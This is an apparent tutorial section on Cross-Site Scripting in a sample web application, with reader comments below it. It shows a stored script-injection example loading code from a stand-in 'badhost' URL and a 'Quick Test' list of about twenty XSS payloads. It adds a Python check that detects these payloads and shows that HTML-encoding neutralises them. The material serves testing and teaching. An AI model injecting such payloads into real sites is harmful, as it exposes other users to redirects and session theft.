by Bryian Tan
Cross-Site Scripting
Cross-Site Scripting enables malicious attackers to inject client-side script or HTML markup into web pages viewed by other users. In the sample application this can happen through the comment input form. Update a comment with the string "<script src="http://localhost:9997/badhost/maliciousscript.js"></script>". You should then see a pop-up message when you navigate to the http://localhost:1234/Sample/ListComments.aspx page, because the stored comment is written into the page without being encoded.
Figure 18
Quick Test
Update the form value with any of the strings listed below and observe the outcome. Make sure each string is on a single line with no line breaks. If the browser executes the JavaScript, or the page displays an unexpected result, then the web page is subject to Cross-Site Scripting.
<BODY ONLOAD='javascript:window.location="http://www.google.com"'>
<BODY ONLOAD="javascript:alert('XSS')">
<p onmouseover=javascript:window.location="http://www.google.com";>test
<p onmousemove=javascript:window.location="http://www.google.com";>test
<p onMouseDown=javascript:window.location="http://www.google.com";>test
<span onmouseover=javascript:window.location="http://www.google.com";>test</span>
<span onmousemove=javascript:window.location="http://www.google.com";>test</span>
<h2 onmouseover=javascript:window.location="http://www.google.com";>test
<div onmouseover=javascript:window.location="http://1208929383";>test
<meta http-equiv="refresh" content="1; URL=http://1208929383">
<b onmouseover=javascript:window.location="http://www.google.com";>test
<img onmouseover=javascript:window.location="http://www.google.com";>
<img src=http://www.google.com/images/srpr/nav_logo14.png width="1" height="1" onLoad=javascript:window.location="http://www.google.com";>
<div style="width:100%" onresize=javascript:window.location="http://www.google.com";>test</div>
(Resize the browser to see the behavior)
<tt style="width:100%" onmousemove=javascript:window.location="http://www.google.com";>test
<PLAINTEXT> test
<object> test
<applet> test
<textarea> test
<title> test
<table> test
<style> test
<noscript> test
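As an added example (not part of the original article or its sample project), the Python script below takes a few of the Quick Test strings above as constructed input, renders each one the way a page that echoes stored comments verbatim would and then the way an HTML-encoding page would, and runs a small check that reports any script tag, on* event handler or meta refresh that reaches the browser. The surrounding page markup and the function names are assumptions.

```python
import html
from html.parser import HTMLParser

# Constructed sample input: a few of the article's Quick Test strings plus a benign comment.
SAMPLE_COMMENTS = [
    '<script src="http://localhost:9997/badhost/maliciousscript.js"></script>',
    '<BODY ONLOAD="javascript:alert(\'XSS\')">',
    '<p onmouseover=javascript:window.location="http://www.google.com";>test',
    '<meta http-equiv="refresh" content="1; URL=http://1208929383">',
    'A harmless comment with <3 and a&b in it',
]

def wrap_page(body: str) -> str:
    """Assumed stand-in for the ListComments.aspx markup around one comment."""
    return f'<html><body><div class="comment">{body}</div></body></html>'

def render_unsafe(comment: str) -> str:
    """Vulnerable pattern: the stored comment is written into the page verbatim."""
    return wrap_page(comment)

def render_safe(comment: str) -> str:
    """Hardened pattern: HTML-encode on output, so '<', '>', '&' and quotes become text."""
    return wrap_page(html.escape(comment, quote=True))

class ActiveContentDetector(HTMLParser):
    """Reports markup the Quick Test strings rely on: <script>, on* handlers, meta refresh."""
    def __init__(self) -> None:
        super().__init__()
        self.findings: list[str] = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.findings.append("script tag")
        attr_map = {name.lower(): (value or "") for name, value in attrs}
        if tag == "meta" and attr_map.get("http-equiv", "").lower() == "refresh":
            self.findings.append("meta refresh")
        for name in attr_map:
            if name.startswith("on"):
                self.findings.append(f"<{tag}> with {name} handler")

def active_content(rendered_html: str) -> list[str]:
    """Parse a rendered page and list everything in it that the browser would execute."""
    detector = ActiveContentDetector()
    detector.feed(rendered_html)
    detector.close()
    return detector.findings

if __name__ == "__main__":
    for comment in SAMPLE_COMMENTS:
        print("verbatim:", active_content(render_unsafe(comment)) or "nothing active")
        print("encoded :", active_content(render_safe(comment)) or "nothing active")
```

Encoding on output is what removes the findings; the benign comment passes both ways, which is the behaviour to confirm when fixing the page.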
User Comments
Title:
SQL Injection and Cross-Site Scripting
Name:
DINESH
Date:
2011-01-18 6:25:25 AM
Comment:
The best SQL Server Site Scripting
|
Title:
avrail
Name:
Refat Eid
Date:
2010-09-19 3:02:00 AM
Comment:
Where can I find the TestDBSetup.sql?
|
Title:
Really Good
Name:
Ankit Shivankar
Date:
2010-09-15 1:04:32 AM
Comment:
It's really good... and easy to understand.
Dear Bryian... I'm facing some problems in my personal project. Can you help me? If you can, then please contact me at my mail id, which is shiva.ankit@gmail.com
|
Title:
Download Link
Name:
Bryian Tan
Date:
2010-09-14 8:21:24 PM
Comment:
Hello,
Sorry, I think I forgot to include the download link. Anyway, please download the sample code from here http://download.ysatech.com/SQL-Injection-and-Cross-Site-Scripting/Sample_SQLInjection_XSS.zip
|
Title:
Gustavo
Name:
Fernandez
Date:
2010-09-14 3:19:45 PM
Comment:
Where is the link to download the code sample (TestDBSetup.sql)?
|
Title:
Senior programmer/analyst
Name:
Greg Hilsheimer
Date:
2010-09-14 2:16:39 PM
Comment:
Where is the link to download the code?